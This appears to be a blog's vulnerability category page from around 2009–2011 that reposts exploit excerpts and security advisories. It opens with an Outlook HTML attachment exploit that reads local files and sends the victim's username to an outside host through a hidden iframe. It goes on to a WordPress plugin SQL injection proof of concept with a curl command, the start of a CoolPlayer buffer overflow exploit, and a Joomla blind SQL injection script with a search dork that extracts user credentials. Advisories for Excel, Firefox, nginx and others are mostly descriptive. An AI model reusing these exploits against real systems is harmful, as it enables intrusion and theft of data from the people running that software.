GO IT WORLD | IT TECH | IT NEWS » vulnerability

Outlook vulnerability explain

jason — Wed, 09 Nov 2011 13:10:35 +0000

Send attenment demo.htm

Code:

<script>

xmlhttp=new ActiveXObject("Msxml2.XMLHTTP.3.0");

xmlhttp.open("GET","../../../../../../../../../../../../../../boot.ini",false);

xmlhttp.send();

alert(xmlhttp.responseText);

</script>

Information:

<script>alert(document.URL)</script>

Get dir info

C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\OLKxxx

Demo:

<script>

var path = document.URL;

var regx = /Settings\\(.*)\\Local/ var rs= regx.exec(path); username=rs[1];

iframe_dom("http://www.80vul.com/hackgame/xs-g0.php?username="+username);

function iframe_dom(script_filename) {

    var d = window.document;

    var newIframe = d.createElement('iframe');

    newIframe.src=script_filename;

    newIframe.style.width = 0;

    newIframe.style.height = 0;

    d.appendChild(newIframe);

    return false;

} </script>

WordPress WP Bannerize plugin <= 2.8.7 SQL Injection Vulnerability

jason — Sun, 02 Oct 2011 11:11:40 +0000

# Exploit Title: WordPress WP Bannerize plugin <= 2.8.7 SQL Injection Vulnerability
# Date: 2011-09-22
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/wp-bannerize.zip
# Version: 2.8.7 (tested)

—————
PoC (POST data)
—————
http://www.site.com/wp-content/plugins/wp-bannerize/ajax_sorter.php
limit=1&offset=1&item[]=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)

e.g.
curl –data "limit=1&offset=1&item[]=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)" -H "X-Requested-With:XMLHttpRequest" http://www.site.com/wp-content/plugins/wp-bannerize/ajax_sorter.php

—————
Vulnerable code
—————
if ( @isset($_SERVER['HTTP_X_REQUESTED_WITH']) ) {
    …
    $limit = intval($_POST['limit']);
    $page_offset = (intval($_POST['offset']) – 1) * $limit;

… Read the rest

Microsoft Excel Record Integer Signedness Vulnerability

jason — Fri, 16 Sep 2011 05:44:50 +0000

I. BACKGROUND

Excel is the spreadsheet application included with Microsoft Corp.’s Office productivity software suite. More information is available at the following website:

http://office.microsoft.com/excel/

II. DESCRIPTION

Remote exploitation of an integer signedness vulnerability in Microsoft Corp.’s Excel could allow an attacker to execute arbitrary code with the privileges of the current user.

The vulnerability is an integer signedness issue that leads to an invalid array indexing vulnerability. It is triggered by a certain record with a negative ‘iax’ field.

It is possible to pass negative 16-bit values, which are later sign extended to 32 bits. The sign… Read the rest

CoolPlayer 219 Buffer Overflow Exploit

jason — Sat, 13 Aug 2011 02:25:13 +0000

# #########################################################################
#~ Title         : CoolPlayer 219 Buffer Overflow Exploit
#~ Software      : http://coolplayer.en.softonic.com/
#~ Tested on     : Windows XP SP3 English
#~ Date          : 04/07/2011
#~ Author        : X-h4ck
#~ Site          : http://www.pirate.al/ #PirateAL Crew , http://theflashcrew.blogspot.com/
#~ Email         : mem001@live.com
#~ Greetz        : Wulns~ – IllyrianWarrior – Danzel – Ace – M4yh3m – Saldeath – bi0 – Slimshaddy – d3trimentaL – Lekosta – Pretorian – CroSs(r00tworm) – Rigon
# #########################################################################

#!/usr/bin/python
print " CoolPlayer 219 Buffer Overflow Exploit"
print " Author : X-h4ck"

… Read the rest

Mozilla Foundation Security Advisory 2011-20

jason — Thu, 23 Jun 2011 14:53:49 +0000

Title: Use-after-free vulnerability when viewing XUL document with script disabled
Impact: Critical
Announced: June 21, 2011
Reporter: Martin Barbella
Products: Firefox, Thunderbird, SeaMonkey
Fixed in: Firefox 5
Firefox 3.6.18
Thunderbird 3.1.11

Description

Security researcher Martin Barbella reported that under certain conditions, viewing a XUL document while JavaScript was disabled caused deleted memory to be accessed. This flaw could potentially be used by an attacker to crash a victim’s browser and run arbitrary code on their computer.

References

nginx php file parse vulnerability

jason — Thu, 27 May 2010 05:02:49 +0000

nginx [engine x] is a HTTP and reverse proxy server, as well as a mail proxy server written by Igor Sysoev. It has been running for more than five years on many heavily loaded Russian sites including. The vulnerability will let error file type as php file. It’s a very critical bug.

Generally, nginx will parse php file by cgi. Example:

location ~ \.php$ {
root html;
fastcgi_pass 127.0.0.1:9000;
fastcgi_index index.php;
fastcgi_param SCRIPT_FILENAME /scripts$fastcgi_script_name;
include fastcgi_params;
}

In location part,nginx will proceed request by URI variable, and the SCRIPT_FILENAME’s value will be defined… Read the rest

Joomla Component com_joomlaconnect_be Blind Injection Vulnerability

jason — Fri, 26 Feb 2010 09:44:47 +0000

Test Code


#!/usr/bin/php
  <?php 

ini_set("max_execution_time",0); 

print_r(' 

########################################################################### 

[»] Joomla com_joomlaconnect_be Remote Blind Injection Vulnerability 

########################################################################### 

[»] Script:   [Joomla] 

[»] Language: [ PHP ] 

[»] Founder:  [ Snakespc Email:super_cristal@hotmail.com - Site:sec-war.com/cc> ] 

[»] Greetz to:[ Spécial >>>>His0k4 >>>>   Tous les hackers Algérie 

[»] Dork: inurl:index.php?option=com_joomlaconnect_be 

########################################################################### 

########################################################################### 

# 

#  Joomla com_joomlaconnect_be (id) Blind SQL Injection Exploit 

#  [x] Usage: joomla.php "http://url/index.php?option=com_joomlaconnect_be&Itemid=53&task=showBizPage&id=3 

# 

# 

########################################################################### 

'); 

if ($argc > 1) { 

$url = $argv[1]; 

$r = strlen(file_get_contents($url."+and+1=1--")); 

echo "\nExploiting:\n"; 

$w = strlen(file_get_contents($url."+and+1=0--")); 

$t = abs((100-($w/$r*100))); 

echo "Username: "; 

for ($i=1; $i <= 30; $i++) { 

$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$i.",1))!=0--")); 

   if

… Read the rest

Changetrack 4.3-3 Local Privilege Escalation Vulnerability

jason — Sat, 03 Oct 2009 14:07:10 +0000

TITLE:
Changetrack Privilege Escalation Vulnerability

SECUNIA ADVISORY ID:
SA36756

VERIFY ADVISORY:
http://secunia.com/advisories/36756/

DESCRIPTION:
A vulnerability has been discovered in Changetrack, which can be
exploited by malicious, local users to gain escalated privileges.

The application does not properly escape certain file names, which
can be exploited to inject and execute arbitrary shell commands
(potentially with "root" privileges) by creating a maliciously named
file in a directory tracked by Changetrack.

Successful exploitation requires write privileges to a directory
scanned by Changetrack.

SOLUTION:
Use Changetrack to track trusted… Read the rest

Please immediately upgrade your wordpress to 2.8.4

jason — Thu, 13 Aug 2009 03:20:05 +0000

A vulnerability was discovered: a specially crafted URL could be requested that would allow an attacker to bypass a security check to verify a user requested a password reset. As a result, the first account without a key in the database (usually the admin account) would have its password reset and a new password would be emailed to the account owner. This doesn’t allow remote access, but it is very annoying.

We fixed this problem last night and have been testing the fixes and looking for other problems since then. Version 2.8.4 which fixes all known problems is now… Read the rest

NcFTPd <= 2.8.5 Remote Jail Breakout Vulnerability

jason — Fri, 31 Jul 2009 06:20:45 +0000

Discovered by:
Kingcope
Contact: kcope2<at>googlemail.com / http://isowarez.de

Date:
27th July 2009

Greetings:
Alex,Andi,Adize,wY!,Netspy,Revoguard

Prerequisites:
Valid user account.
Demonstration on FreeBSD 7.0-RELEASE and NcFTPd 2.8.5 (latest version):

# ftp 192.168.2.5
Connected to 192.168.2.5.
220 localhost NcFTPd Server (unregistered copy) ready.
Name (192.168.2.5:root): kcope
331 User kcope okay, need password.
Password:
230-You are user #1 of 50 simultaneous users allowed.
230-
230 Restricted user logged in.
Remote system type is UNIX.
Using binary mode to transfer files.… Read the rest